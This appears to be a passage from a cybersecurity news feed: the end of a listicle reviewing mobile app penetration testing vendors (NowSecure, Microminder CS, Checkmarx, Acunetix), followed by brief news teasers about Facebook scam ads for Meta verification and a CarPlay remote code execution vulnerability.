    NowSecure offers a comprehensive mobile app security platform that combines automated and manual testing. Their platform provides continuous security testing within the SDLC, with capabilities for static, dynamic, interactive, and API analysis.

    They are particularly well-regarded for their ability to integrate with CI/CD pipelines and their commitment to standards-based testing, such as OWASP MASVS. NowSecure also provides expert-led penetration testing as a service.

    Reason to Buy:

    The most comprehensive and scalable solution for integrating continuous, standards-based mobile application security testing into a DevSecOps pipeline.

    Features:

    • DevSecOps integration
    • Automated and manual testing
    • OWASP MASVS compliance
    • Mobile App Risk Intelligence (MARI)
    • Expert-led penetration testing services

    Pros:

    • Excellent for continuous testing
    • Highly scalable platform
    • Strong compliance focus
    • Combines automation with human expertise

    Cons:

    • Platform can be complex to navigate
    • Can be expensive for smaller teams
    • Requires a good understanding of the platform to maximize its value

    ✅ Best For: Large enterprises and organizations committed to a mature DevSecOps model, needing a scalable and integrated mobile security solution.

    Official Website: NowSecure

    8. Microminder CS


    Specifications:

    Microminder CS is a CREST-certified infosec consultancy that offers comprehensive mobile application testing services. Their methodology involves a four-stage process: intelligence gathering, app analysis, exploitation, and reporting.

    They simulate real-world attacks to find vulnerabilities in data transmission, storage, authentication, and session management, providing both executive and technical reports with actionable remediation advice.

    Reason to Buy:

    A trustworthy, CREST-certified consultancy that provides a holistic and professional approach to mobile application penetration testing with a strong focus on remediation.

    Features:

    • CREST-certified experts
    • Four-stage methodology
    • Real-world attack simulation
    • Executive and technical reports
    • Global presence and service

    Pros:

    • High level of expertise and certification
    • Holistic and professional approach
    • Delivers clear, actionable reports
    • Strong reputation for quality

    Cons:

    • Service-based model, less focused on automation
    • May be more expensive than platform-based tools
    • Not ideal for continuous testing needs
    • Primarily a service provider, not a tool vendor

    ✅ Best For: Organizations that need a full-service, expert-led engagement from a highly certified and globally respected security firm.

    Official Website: Microminder CS

    9. Checkmarx


    Specifications:

    Checkmarx provides a comprehensive application security testing platform with a strong focus on static analysis (SAST).

    While its core is source code analysis, it offers solutions that help identify and fix vulnerabilities in mobile applications by integrating security into the development workflow.

    The platform also provides DAST, IAST, and SCA capabilities to offer a more complete view of application risk.

    Reason to Buy:

    For organizations that want to “shift left” and embed security testing directly into the development pipeline, using a platform with a global reputation.

    Features:

    • SAST, DAST, and SCA
    • Source code analysis
    • DevSecOps integration
    • Detailed reports with remediation advice
    • Aligned with OWASP Top 10

    Pros:

    • Strong reputation and industry presence
    • Deep source code analysis capabilities
    • Integrates with many dev tools
    • Helps with compliance

    Cons:

    • Can be slow on large codebases
    • High number of false positives can be an issue
    • Not a specialized mobile pentesting service
    • Pricing can be complex

    ✅ Best For: Large-scale software development teams that need to integrate robust, automated security scanning early in the development lifecycle.

    Official Website: Checkmarx

    10. Acunetix


    Specifications:

    Acunetix is a widely-used web vulnerability scanner that also offers a robust solution for securing mobile applications that rely on web APIs and back-end services.

    While it’s a DAST-focused tool, its ability to crawl and scan complex web applications, single-page apps, and password-protected pages makes it a valuable asset in the mobile security toolkit.

    Acunetix helps organizations comply with standards like PCI-DSS and HIPAA by generating detailed compliance reports.

    Reason to Buy:

    A powerful, automated DAST solution that is easy to set up and provides high-accuracy vulnerability detection for web services that power mobile apps.

    Features:

    • High-accuracy DAST scanning
    • Integrates with CI/CD tools
    • Supports many compliance standards
    • Detailed, actionable reports
    • API vulnerability testing

    Pros:

    • High detection rate and low false positives
    • Easy to use and set up
    • Good for API-driven mobile apps
    • Robust reporting features

    Cons:

    • Not a pure mobile application security tool
    • Lacks manual, human-led pentesting
    • Primarily focuses on the web components of an app
    • Less suited for on-device vulnerabilities

    ✅ Best For: Teams primarily concerned with securing the web APIs and back-end infrastructure that their mobile applications rely on.

    Official Website: Acunetix

    Conclusion

    Choosing the best mobile application penetration testing company is a critical decision for any organization today. The right partner can not only identify hidden vulnerabilities but also help you build a more secure development process.

    The companies listed here represent a diverse range of services, from highly specialized manual testing to comprehensive, automated platforms.

    By evaluating your specific needs—whether it’s a deep, one-time audit or a continuous security program—you can select the provider that offers the most effective solution for protecting your mobile applications and your users.

    The post Top 10 Best Mobile Application Penetration Testing Companies in 2025 appeared first on Cyber Security News.


  • Content creators and small businesses are facing a sophisticated new threat targeting their Facebook accounts through deceptive advertisements promising free Meta verification badges. A new malvertising campaign is targeting Facebook users with malicious ads that promise to unlock Meta’s coveted blue verification tick through a seemingly legitimate browser extension. These ads, accompanied by instructional videos, […]

    The post Meta Verified Scam Ads on Facebook Steal User Account Details appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A newly disclosed vulnerability in Apple’s CarPlay ecosystem enables remote code execution with root privileges, posing a serious risk to connected vehicles. Discovered by the Oligo Security Research team and tracked as CVE-2025-24132, the flaw resides within the AirPlay protocol implementation used by CarPlay systems. CVE ID Affected Components Versions Impacted CVE-2025-24132 AirPlay Audio SDK < 2.7.1 […]

    The post Apple CarPlay Vulnerability Allows Remote Code Execution to Gain Root Access appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
